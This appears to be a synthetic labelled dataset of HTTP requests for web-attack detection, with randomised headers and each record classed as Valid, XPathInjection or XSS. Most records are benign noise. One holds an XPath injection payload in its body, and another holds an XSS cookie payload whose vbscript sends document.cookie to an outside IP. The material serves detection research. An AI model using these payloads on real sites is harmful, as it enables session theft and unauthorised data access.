GET /oedluttneg9hsqrofe/oQHvJno/soihxftpBrEnsn/9zatexio/smyesc3sdUofretqlz/olKDBRmavKFcdD-/lOP6D7_iS7dewLwnr5/pal0t3aodmgnn2lw/FJvALJ3all/fYwXQ.l.io.mdb? HTTP/1.0
Host: 182.145.7.34:0
Connection: ahOeuma
Accept: */*
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 240.49.150.235
Cookie: 0biioetph=n-r@1Nq5I_
Cookie2: $Version="60"
Date: Tue, 02 Dec 08 17:58:04 CET
ETag: "0uLjov9Nslyl1Um57Gg"
Expect: thS2ch
From: fbsohcou@fT8svas.cz
If-Modified-Since: Fri, 08 Jun 07 15:22:17 GMT
If-Unmodified-Since: Sun, 11 Mar 07 04:05:53 GMT
If-Match: "mHAWrzrTGC_TYOrOI.."
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 6.2
Pragma: dTep=rAtuehro
Proxy-Authorization: Basic aW1laXA6dHFmZWRhcA==
Authorization: Basic cmxjYWZlbDpudHBiZW4=
Range: -96,366774-,-767
Referer: /arw7.sh
TE: gzip,trailers,chunked
Trailer: If-Range
User-Agent: ejAYYoAHa http://www.tnathr.biz
UA-CPU: 68000
UA-Disp: 0555,2366,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4259x4108
Via: 3.9 www.mdzrh.js:6, HTTP/2.8 144.182.51.134, FTP/1.8 www.asedw.shtml:26340
Transfer-Encoding: identity
Upgrade: k0e/8.3, ee0yu1/6.5, csixbf/0.4
Warning: 853 www.Irfoniec.gif "balae9aEasdiral" 
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 28006910
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15149
Start - Id: 48560
class: XPathInjection
PUT /lgtRei/cvsseZi6hDayshecREh/hahmsa/dp6ameseeGnheTe/FtelnetaTcZK2FcopyPZIvary/tOv18jmOK/JuueV/kt/i-nzh-x-ekwtj@v.htm? HTTP/1.1
Content-Length: 137
Content-Language: 9eUm2e
Content-Encoding: deflate
Content-Location: http://eiegs.org/prrgw/ueena4.sh
Content-MD5: dGUxZEhhaG9hc2hodWViaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Sep 09 01:33:25 GMT
Last-Modified: Wed, 17 Feb 10 22:50:34 UTC
Host: www.drl7aZL.net
Connection: Gdt0
Accept: */*;q=0.4
Accept-Charset: iso-10646-ucs-2;q=0.2, isiri-3342;q=0.3, x-mac-japanese;q=0.6, x-mac-arabic;q=0.7, x-mac-turkish;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 35.27.240.12
Cookie: uipp=368043
Cookie2: $Version="8"
Date: Tue, 16 Mar 10 11:31:14 CET
ETag: W/".NpEoPMJ922d-Z-plN"
Expect: 100-continue
From: w3nw@eoeld2.be
If-Modified-Since: Tue, 19 Jan 10 09:06:58 UTC
If-Unmodified-Since: Wed, 07 May 08 19:34:48 GMT
If-Match: "Z6c43SIzfP2qH58GinIm"
If-None-Match: *
If-Range: *
Max-Forwards: 60
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: siue bdclebse=ssaui
Authorization: NTLM cm1zbFN2OW5hdHlkYmhmb0xrZ1lpRTRhb3F0c3B5ZFNob2UybQ==
Range: 25-032
Referer: /7tumdRu/Ymoo7tcs.tiff
TE: gzip;q=0.7,trailers,trailers
Trailer: Authorization
User-Agent: iUErWQk5 http://www.jDctsieo.org
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0026x0337
Via: FTP/1.2 242.10.23.190:4004, 0.4 www.bmaer2a0.jpeg, 0.6 238.123.228.199:965
Transfer-Encoding: nhRze
Upgrade: hdd/2.5, srv6ai/3.5, iasxg/4.6, tll/9.7, szunoe/7.7
Warning: 651 www.filmtc.css "8HFtmshdumhqpyai" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

fenaeieeeroFhv=wtbadneBnopS9eeeo&wnteties1In=t9t8eee'   or    6     <  count(path/child::*)  or     'TI3mdgr'    ='

End - Id: 48560
Start - Id: 10844
class: Valid
GET /Ltzndd/iinvb2zeeiteue10ou/uV/m_6kxY07yhHLIHJOOo16/65Sooaios.js?dnRysszReMr1e=pBTe&hos=a&eeaenpimewedrnn=sCV7MlaRV&eao3n=enPHNQeY5&I5MyX=580&qretTs2sd9i8sa=03988 HTTP/1.0
Host: 62.215.61.96:80
Connection: tgkdbe
Accept: image/*, application/*
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.3
Accept-Language: *
Cache-Control: max-age=79
Client-ip: 217.184.252.45
Cookie: tf1atgsO=fwbng;ftenaEcl2=293803
Cookie2: $Version="4"
Date: Sun, 17 Sep 06 03:25:10 GMT
ETag: W/"Gj6b1SdyZBNCKwHOrY"
Expect: sihdulZC
From: MAtn@aarleli.uk
If-Modified-Since: Sat, 04 Jun 05 06:30:34 GMT
If-Unmodified-Since: Sat, 19 Jun 04 04:43:51 UTC
If-Match: "0QwDrLs0CYOaE9M.Sq"
If-None-Match: *
If-Range: Sat, 05 Sep 09 15:48:00 GMT
Max-Forwards: 045
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=/samreir/LeceOENt/ntewh/oneeu.rar
Range: 4-714445,-073,95110-496
Referer: /ds6W7a/5hut/oniairs/gE5eeeu/grynnCb.asp
TE: trailers,deflate;q=0.1,trailers
Trailer: Trailer
User-Agent: tjsKfO http://www.eohh.org
UA-CPU: StrongARM
UA-Disp: 7212,6532,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 633x671
Via: edm/0.1 227.224.87.147
Transfer-Encoding: deflate
Upgrade: clli/2.2, tee/6.7, b4acRj/4.6, raese/1.9
Warning: 821 192.39.173.188:50926 "iiEwc" 
X-Forwarded-For: 96.51.246.201
X-Serial-Number: 907495686273869
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10844
Start - Id: 22014
class: Valid
GET /otSz1zDW@Ee/pByTkxz.huk7LN2P2mac/Wq_L/EhrhiRgoynVgii/sOZfmVl6DjLa/s@gVp8sdy-7KwvpCW/z8w/h@8qz4X/K@XZRvPhttp_/des0dhjssss5qa/izF9/uhebtau7.tiff? HTTP/1.1
Host: 160.29.99.156
Connection: hyrs
Accept: application/*;q=0.2, text/plain
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: chs7oarf-ornsh;q=0.8
Cache-Control: no-store
Client-ip: 166.123.70.154
Cookie: OshgUbnb0n7md=o7EEcpwA53fN;InQ2.5Kf=825981;zhenyyiisS=869057;1nemoqtoh3ian=updatesotto
Cookie2: $Version="68"
Date: Fri, 22 Feb 08 11:21:29 UTC
ETag: "DOclkJFUcZnZgFdJvgB"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Sat, 21 Jun 08 03:05:48 GMT
If-Unmodified-Since: Tue, 13 Feb 07 21:43:06 UTC
If-Match: "znime6pmX.@MJ0ue-D"
If-None-Match: "s4hp87YFtCLTxqMN"
If-Range: *
Max-Forwards: 7
MIME-Version: 1.6
Pragma: slehnE='rnas'
Proxy-Authorization: Basic b2ROb2V2Om9sYTc=
Authorization: NTLM YWhlZXhvYW5yd3lpYXU2YXVmckFlaUl0Z2htU0F0aW5laVRtbDA1dDk=
Range: -069889,708496-
Referer: http://d7uW.fr/ntjc0/o6ht/olh40m/orsn8.txt
TE: trailers
Trailer: Expect
User-Agent: sie9qy6 (gnjYzq; lhDlk_cstk; aQjl_cF; gj564MJ2E; hHKzHpoHT)
UA-CPU: Sparc
UA-Disp: 838,087,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 915x5252
Via: 0.0 56.132.50.42, inp/4.7 www.ss1t.html, HTTP/0.9 165.152.239.27
Transfer-Encoding: deflate
Upgrade: Ctdif/3.9, swteeu/3.3
Warning: 409 www.rklthno.jpeg "2gidteht4e3rseoOd" 
X-Forwarded-For: 167.167.68.206
X-Serial-Number: 920022590702
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22014
Start - Id: 26367
class: Valid
GET /openOy/5muFjeZC.nsf?26jq_G3r=altyelroA&eszno=e7c%3Cr68rKses8lht%2Bn HTTP/1.0
Host: 171.248.11.195:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: compress, gzip, compress;q=0.8, deflate;q=0.2, identity
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 239.154.38.15
Cookie: etrfesu=oi;erkr=lI5W5qJ@;Xpeus=Nopenecat]s(@|r~ea;-CRb=uhud\ha9dphtpasss;eae=henull;nihNente8ae=/anu3oa]iriiframen
Cookie2: $Version="52"
Date: Wed, 27 Apr 05 19:53:07 UTC
ETag: W/"wUObuZggkn9hL2N"
Expect: muahett
From: ndches@oshs.org
If-Modified-Since: Sun, 02 Nov 08 03:17:58 CET
If-Unmodified-Since: Mon, 03 May 10 03:35:27 GMT
If-Match: *
If-None-Match: "zkjKHH7BnBtWkj@yX9In"
If-Range: Fri, 22 Jun 07 20:46:59 GMT
Max-Forwards: 9
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dt5a"
Authorization: Digest cnonce="4ywog"
Range: 7-,8-
Referer: http://5srhGnl.gov/1amjOM5/abbime/smz60ub.php
TE: gzip;q=0.7,gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.8 (compatible; MSIE 0.3; Solaris; 8eoeB; aesavitcz)
UA-CPU: 68000
UA-Disp: 4074,748,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 778x382
Via: 0.3 65.76.244.0:36832, HTTP/5.2 188.31.241.103
Transfer-Encoding: identity
Upgrade: f3i/7.2, 4xgd/4.9, 4m3er7/4.0, uiai/5.6
Warning: 900 33.197.164.138 "2Ht9Fspan" "Tue, 08 Feb 05 10:29:57 UTC"
X-Forwarded-For: 113.183.151.252
X-Serial-Number: 683890347
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26367
Start - Id: 3522
class: Valid
GET /uKwaAPemjUmFayS_R/rbbs1foahiUs7medo2ot/mMaWaffH/eHysrStthfiagwfwhe1/rTsebabn7Esal/bFJH2hLIMLu0_yrq/gZhtinddDessetnEdi/wvunionfK/ogJfqGBA7auNFEm-ux/vde/PVO/096aOb.aspx?dbEyxi8q=seuKLUnl HTTP/1.0
Host: 109.90.15.111
Connection: eumlnoa
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: min-fresh=9927
Client-ip: 100.5.164.201
Cookie: 7eis=48137;mtDaObewoais=rc:hg;BWQQmeta_libK1G=963;lnesj=rou0nfzl
Cookie2: $Version="18"
Date: Wed, 01 Apr 09 11:45:13 CET
ETag: W/"soakEDI7uEqLVoLk@M"
Expect: bcZe=stMl
From: 4qmTaq3m@xens.uk
If-Modified-Since: Sat, 19 Sep 09 02:54:44 CET
If-Unmodified-Since: Fri, 12 Jun 09 12:54:42 CET
If-Match: "CoABRlvId.GAcfwfPBG"
If-None-Match: *
If-Range: Tue, 04 May 04 23:16:14 CET
Max-Forwards: 9976
MIME-Version: 1.6
Pragma: ve=hf
Proxy-Authorization: Digest response="eFaFDEbfbED7Ace2E02FFEf6ee2a8BAF"
Authorization: Digest uri=/dE1d/Srnmisr.bin
Range: 0-91,8335-51366
Referer: /epblai/6riDOr/edzjaas.exe
TE: deflate,trailers,gzip;q=0.1
Trailer: Connection
User-Agent: Mozilla/6.1 (X11; U; Solaris 3.3; hn-to; rv:6.6.4) Gecko/87773737
UA-CPU: MIPS
UA-Disp: 845,505,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 337x1386
Via: r7g/1.8 209.201.106.177, 3.2 67.199.112.34
Transfer-Encoding: compress
Upgrade: slh/6.3
Warning: 996 www.oioeoa.png "henuSrMevtewo9Rnoa2h" "Sun, 29 Nov 09 11:37:16 CET"
X-Forwarded-For: 233.242.107.236
X-Serial-Number: 77802
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3522
Start - Id: 6685
class: Valid
POST /aMceestp1/jSd/cK-dB8dyzYmtElK/h0C4sC1Tmsq/oPpBcFSr.htm? HTTP/1.1
Content-Length: 94
Content-Language: ls,cy
Content-Encoding: compress
Content-Location: http://www.eanuv8li.org/smEet.css
Content-MD5: aHN5YWl3cDdvZWlhZ29lbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jun 07 23:24:58 UTC
Last-Modified: Mon, 23 Mar 09 09:36:05 CET
Host: www.p7qnTc.gov
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 177.176.36.93
Cookie: tsirsheadm=meL3u@;uxr0=nPO
Cookie2: $Version="165"
Date: Sun, 04 Sep 05 23:36:47 UTC
ETag: W/"OzNTcUQUDnlWNKL"
Expect: otntth=tlnunhit
From: R5anodt@eiRwb.com
If-Modified-Since: Sat, 24 Apr 04 18:10:01 GMT
If-Unmodified-Since: Sun, 20 Apr 08 02:39:31 UTC
If-Match: "20zeabnk5OL3nWet@"
If-None-Match: "KV2gbtRqDdiq4jLw"
If-Range: *
Max-Forwards: 4
MIME-Version: 7.7
Pragma: bwtyh='nos'
Proxy-Authorization: Basic dW51dGVlOmFuaHJ5
Authorization: NTLM ZTYyZG9laWN0RW9hNGU5bm50dG1pbnFnZXdhU3Nia2tudGR0Umw=
Range: 954790-0,-841813,-6
Referer: /ispmzi/rediar/yvox2zdx/hkpqsyqa.pdf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 1.0; aE-rg; rv:6.2.8) Gecko/69257309
UA-CPU: Sparc
UA-Disp: 8391,040,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 075x397
Via: FTP/8.0 116.91.112.159
Transfer-Encoding: gzip
Upgrade: tuerio/7.1, 9oaf/9.3
Warning: 328 87.235.107.21:6 "yeEm5ldtz5jh9osxe" "Sat, 08 Jan 05 05:18:30 GMT"
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 688311326706532
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rbilyy8qrNn=bv8D&wibrnw=68777829&aoi3vsNyte=lft?nenuw2rcphd~oiW&winnth8Z-samH=gYe8ofpnnpnr

End - Id: 6685
Start - Id: 5151
class: Valid
PUT /eDB8NkL1WmTV@RD/lfrqZjFGLd8/5sKJm.1342/on126hPAee9tedmdpww/eaf/kOhtpassudiv2qC5replace.cfm? HTTP/1.0
Content-Length: 155
Content-Language: oyupUoxe,site8
Content-Encoding: identity
Content-Location: /jeeeErc.swf
Content-MD5: aW5pdGVhd2dUUzF1YWFpeA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Sep 07 10:55:56 GMT
Last-Modified: Mon, 19 Feb 07 17:55:14 UTC
Host: www.bordyriaor.fr
Connection: Iasntsy
Accept: video/*;q=0.1
Accept-Charset: euc-kr;q=0.0, x-mac-cyrillic, iso-8859-3, euc-jp;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 56.52.230.64
Cookie: niqa07=/nee
Cookie2: $Version="7"
Date: Wed, 30 Nov 05 12:25:53 UTC
ETag: W/"YOE9Cj.G3xNwVs6YbIL"
Expect: 100-continue
From: sttS3e@cNouiuhrt.it
If-Modified-Since: Mon, 18 Jun 07 16:18:07 GMT
If-Unmodified-Since: Wed, 09 Dec 09 20:29:43 UTC
If-Match: "@DUinmvkcoe.iY6Ns"
If-None-Match: *
If-Range: *
Max-Forwards: 1009
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM aXJ0Y2lxMW45c2g0bGFvb0hlc0RhYW90dmVzSWFlaThlYXdlYXVsaW8=
Range: 851253-34094,-44,88-5
Referer: http://Ypljuf.fr/beadsD.pdf
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/2.5 (X11; U; Open BSD i586 6.0; 4c-6p; rv:7.6.5) Gecko/54299971
UA-CPU: MIPS
UA-Disp: 279,387,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1638x365
Via: HTTP/7.2 94.67.98.106, 5.3 www.5aew.shtml:23377
Transfer-Encoding: gzip
Upgrade: t9eB/4.7
Warning: 099 250.18.191.100 "asvleLepasc" "Fri, 09 Nov 07 15:36:51 UTC"
X-Forwarded-For: 199.181.19.164
X-Serial-Number: 083639126
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~

HYwindow.openeZHFV-q=oeti&nifaaLpsrF6i=24t- (Ea3o 9ed&dbl0i=(isoe da1&tO9Qy=883966871&chit9o=6736&bsyiaawDi=289719380&olnsx=geircapecei&sEse=nk5XYiyBRf

End - Id: 5151
Start - Id: 16197
class: Valid
GET /nieboethdoatcftasn.nsf? HTTP/1.1
Host: 90.64.34.64
Connection: keep-alive
Accept: video/*
Accept-Charset: *
Accept-Encoding: compress, deflate, deflate;q=0.6, compress
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 88.130.176.9
Cookie: ditn2mi=956;eohnEfnh=002331
Cookie2: $Version="66"
Date: Fri, 11 Jan 08 06:19:20 UTC
ETag: "r6Ok.Mt9kaIy_7c8Hl"
Expect: ttov=si6g
From: oltae@ieknifNr4.org
If-Modified-Since: Thu, 12 Feb 09 10:57:55 GMT
If-Unmodified-Since: Mon, 20 Dec 04 05:53:05 GMT
If-Match: "nVgCtx.J_L.jsILl_"
If-None-Match: "8SFeIez_.erBSkIpM9OG"
If-Range: *
Max-Forwards: 20
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic ZmVsenphaWE6M3dydDJx
Authorization: NTLM VWNnNGVjeXJjdE1zUmFXNnQybW9PYW5hcnJ0MGEwY2FvbnRhb3dpZXRjRGFzczZh
Range: 635922-
Referer: /aaoI/emuiae/urlm/reaeere/eHrmrvao.exe
TE: gzip;q=0.4
Trailer: Max-Forwards
User-Agent: Mozilla/6.4 (compatible; MSIE 9.0; SunOS sun4u; oqitn0un)
UA-CPU: PowerPC
UA-Disp: 121,346,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: 6.1 49.229.65.14, 4.8 35.164.172.128, 7.6 www.ftscx.css
Transfer-Encoding: frrkht; ansua=ito6a
Upgrade: nA2o/3.8, dn7sz/2.0, oTeya/7.1
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 113.16.19.192
X-Serial-Number: 81431781
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16197
Start - Id: 18169
class: Valid
GET /9xeL8lsj7NV7RHt/zQIjZSsIk/euwobzocnmgitittve/lSiqxeevmIyu/2YU8S@_AvC@Hp_/eNg2S/nde/cMuT7LnnYl@Q4.pwAnZ-/t7YTrK1kVW0DZ/odg6d0ENcdcHw1YN/rDwrW9V.shtml?wdtee=%3D7oe%40&zN8nmx99e=13750&ko7vlr=aeMr1t9ssh16ha&ah=N0em0goLyao7fieg&imwLe=xuP+&my=6208&ri=sloe%29lfis9tutei HTTP/1.1
Host: 195.134.226.139:051
Connection: close
Accept: video/*;q=0.6, application/zip, video/mpeg;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 43.149.237.246
Cookie: Aitmaadese3pai=uslm8atl
Cookie2: $Version="508"
Date: Tue, 17 Apr 07 08:58:37 CET
ETag: W/"xiXZMfZrxR-2EQrK0T5U"
Expect: 100-continue
From: udml@oe5nd.uk
If-Modified-Since: Mon, 16 Apr 07 07:59:30 UTC
If-Unmodified-Since: Tue, 18 May 04 10:53:29 CET
If-Match: "g.hOfGIIWeYu4rknWb"
If-None-Match: "9mG6SlSl9c0FidRcBi@"
If-Range: Mon, 22 Dec 08 17:53:50 GMT
Max-Forwards: 122
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM bzJuTGVlaVducmxpbXNhc21OdGU1bEZsaWF0dGVlam9ydw==
Authorization: Digest username="dtr2cTi"
Range: 875436-348852,-818
Referer: /tsblnxsb/t2sf3s/eerad/ahii/itrbxar.cgi
TE: deflate,gzip;q=0.6
Trailer: Pragma
User-Agent: Mozilla/3.9 (compatible; Konqueror/7.4; Windows NT; iidiyq)
UA-CPU: MIPS
UA-Disp: 904,033,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3922x0648
Via: FTP/2.2 34.93.49.220
Transfer-Encoding: neehae; no0nen=ATiwlds
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 282 www.mtd6lng.tiff "rqniee0sohncxoe" 
X-Forwarded-For: 53.225.75.3
X-Serial-Number: 45102302554958015
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18169
Start - Id: 9418
class: Valid
GET /ee.html? HTTP/1.0
Host: www.eNtmpraF1.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.3, gzip, deflate;q=0.4, deflate, gzip;q=0.5
Accept-Language: yome-ooe, ihnrSn6f-el3ts, htlt3-unaA;q=0.7, rdcoa-S
Cache-Control: only-if-cached
Client-ip: 117.30.4.151
Cookie: script._u=nF6traHohnjilp;dreahtLAgo=enrlx>icu
Cookie2: $Version="956"
Date: Sat, 27 Feb 10 07:17:05 UTC
ETag: "pkgaMft-mgVMqE_IrYK"
Expect: 100-continue
From: xx0art8v@nico4.be
If-Modified-Since: Tue, 29 Jan 08 23:06:52 GMT
If-Unmodified-Since: Wed, 10 Sep 08 15:54:28 UTC
If-Match: "WmPj3nkFLBePB@IbBu"
If-None-Match: "XGFYWSb_VvXOLN_nQ"
If-Range: "7RryTHtfB_r.y3YT"
Max-Forwards: 5838
MIME-Version: 3.5
Pragma: eeorTitn=2
Proxy-Authorization: NTLM aDRla2V1NHNzZ3RuZHJOb29QaGFlZ2ZpNFNhb0N0aGFyaGFPZWhsbnV3
Authorization: Basic ZTJ1OGVlZjpzZDBodA==
Range: 15-64208,-25827,5343-67434
Referer: http://qrtetR.org/rdupt/zxnT/adda8nss/29pRt/a8tl.mp3
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 6.0; ke-aY; rv:5.6.3) Gecko/41165497
UA-CPU: 68000
UA-Disp: 849,768,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 064x637
Via: vUzii/7.1 156.235.55.191, HTTP/4.3 www.s7nNb8ao.jpg, 2.2 www.rtntf1s.jpeg
Transfer-Encoding: deflate
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 933 www.tEc03I.jpeg "aeavhwtsre8nhtum" 
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 637220700897
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9418
Start - Id: 46676
class: XSS
GET /tauqa5br7M/odlsih/hgntseeot0/oq5auTn/vytm.gif? HTTP/1.0
Host: 173.230.134.211:869
Connection: close
Accept: text/xml;q=0.1
Accept-Charset: windows-1258;q=0.3, euc-kr;q=0.3
Accept-Encoding: 
Accept-Language: Alr-nhrretq;q=0.7, g8an3a-hc;q=0.3, el-jlS, 7n-msot
Cache-Control: only-if-cached
Client-ip: 122.1.27.92
Cookie: dZd76ZT=<iframe     src ="   vbscript:[window.open('http://203.40.129.228/tasesi.cgi'+document.cookie);]   " >;alnOroE=74;ieit=539
Cookie2: $Version="540"
Date: Tue, 02 Mar 04 21:07:01 UTC
ETag: W/"9u50R3giJ00UX31EaDee"
Expect: eJiOoru
From: Dped3ih@fknm2tsceo.gov
If-Modified-Since: Sat, 01 Dec 07 06:22:28 UTC
If-Unmodified-Since: Sat, 12 Jul 08 10:26:09 UTC
If-Match: "onME74EOba7Lt3HnFl"
If-None-Match: "TXIXRP9PkLqQXPui4T0W"
If-Range: Wed, 19 Sep 07 14:16:00 CET
Max-Forwards: 3
MIME-Version: 0.9
Pragma: purs='h'
Proxy-Authorization: 5taRoo rnn5=c3tA9
Authorization: Digest qop=auth-int
Range: 2194-5461,312-2895
Referer: /ecygT/iall/sdenemhj/ss0eoenF.png
TE: trailers,trailers,chunked
Trailer: If-Modified-Since
User-Agent: octeni
UA-CPU: x86
UA-Disp: 028,7117,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 630x4242
Via: 5.3 www.leiz.htm, auL/1.0 108.151.227.226
Transfer-Encoding: gzip
Upgrade: ms8pnA/8.6, 2r5c/1.7, a6d/6.2, Hgagks/0.3, dwe/0.6
Warning: 215 182.199.44.60 "ndteejhnqoKy4mea" "Sun, 18 Oct 09 09:17:52 UTC"
X-Forwarded-For: 249.226.25.170
X-Serial-Number: 49725305842038917
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46676
Start - Id: 15974
class: Valid
GET /addltte.css?Dinuucegt7tuas=cttrb&tdo=i&6Vh24i0=32420503&riheecovt=e%27&hehheTaE=wp-t+t&5qmafTtegh0shhi=866 HTTP/1.0
Host: www.boelec.be
Connection: close
Accept: video/*;q=0.6, application/*, text/xml
Accept-Charset: x-mac-korean;q=0.9, isiri-3342, windows-1250;q=0.1, x-mac-cyrillic;q=0.8, windows-1251;q=0.3
Accept-Encoding: identity, compress
Accept-Language: f5-tnian;q=0.0, ortaeii-ec;q=0.7
Cache-Control: o1dthe='radR'
Client-ip: 138.10.250.41
Cookie: h6=zpvien;6ued=ei@e;6ecooy=ia;es;te=otrSfemrSig;00Rxein9kUehrE=l1f
Cookie2: $Version="99"
Date: Mon, 28 Sep 09 15:30:00 UTC
ETag: W/".hMJQqyPu8InX7v.RZBs"
Expect: 100-continue
From: hxmcceeo@ejAn.gov
If-Modified-Since: Fri, 10 Dec 04 22:58:44 GMT
If-Unmodified-Since: Sat, 04 Jun 05 10:24:02 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 05 Dec 06 05:19:06 UTC
Max-Forwards: 0622
MIME-Version: 1.8
Pragma: eeno=redh5ad
Proxy-Authorization: Basic cXVEeHJldXI6ZGlvNmQ=
Authorization: NTLM ZVlhYWNvaWpuZXRvZW9oYW1pZ3RxT2Ruc3dwZXB0ZUk1bkM=
Range: 08-06,-75180
Referer: /tWact/4ntnu/7Anhnci.asmx
TE: chunked,chunked,deflate
Trailer: User-Agent
User-Agent: Mozilla/4.0 (Windows; U; Win98 5.4; dT-wi; rv:8.3.5) Gecko/95710322
UA-CPU: x86
UA-Disp: 956,2189,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 221x576
Via: bwl3/4.1 www.ebrd.gif, HTTP/3.1 www.uuaqb.jpeg:5
Transfer-Encoding: identity
Upgrade: draal1/9.2, 8stse/6.9, tvz7o/8.5
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 167.197.130.101
X-Serial-Number: 47727
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15974
Start - Id: 15726
class: Valid
GET /4xlsQ0xe_3Cbq9D@BiQ/MghuoAoi8iwn/eMFhYw/Ru/u5t/sL1Jcac0AwAoFf@zc.html? HTTP/1.1
Host: 32.86.19.66:80
Connection: close
Accept: application/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: uda9-fsolU;q=0.0, vhrxtuc-ufc;q=0.8
Cache-Control: max-stale
Client-ip: 86.42.199.9
Cookie: qo-0dvGS=nu3TK-MS82;mdEotlx13=860100;umeemeawem=<cmde>xnlcyyeIvt;weefm=631858;aee=r~oem
Cookie2: $Version="7"
Date: Mon, 15 Sep 08 13:56:20 UTC
ETag: W/"@z2OPvcOJlElv3KjQa"
Expect: 6eatinnv
From: uvmHrh6n@nNnouty.biz
If-Modified-Since: Sat, 10 May 08 10:06:20 CET
If-Unmodified-Since: Wed, 14 Nov 07 06:42:27 UTC
If-Match: "pY2uDme6tXvr244Ax"
If-None-Match: "Ao9GR.CJPsK3NK-Vs"
If-Range: Sun, 07 Dec 08 23:35:05 CET
Max-Forwards: 427
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/hee7.css
Authorization: l3hs SiosEBl=eedchr
Range: 2-,-372
Referer: http://gEeew.st/egopano/ee7s/n8usdos/eede.css
TE: trailers,trailers,chunked
Trailer: Accept
User-Agent: Mozilla/5.6 (compatible; gpisr; Unix; stIdirtC5; tcnr9erose; uozal)
UA-CPU: MIPS
UA-Disp: 6952,635,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 638x329
Via: 4.2 137.2.114.229
Transfer-Encoding: gzip
Upgrade: qrejo/1.3
Warning: 005 135.73.33.138 "yr2lt" 
X-Forwarded-For: 76.30.185.202
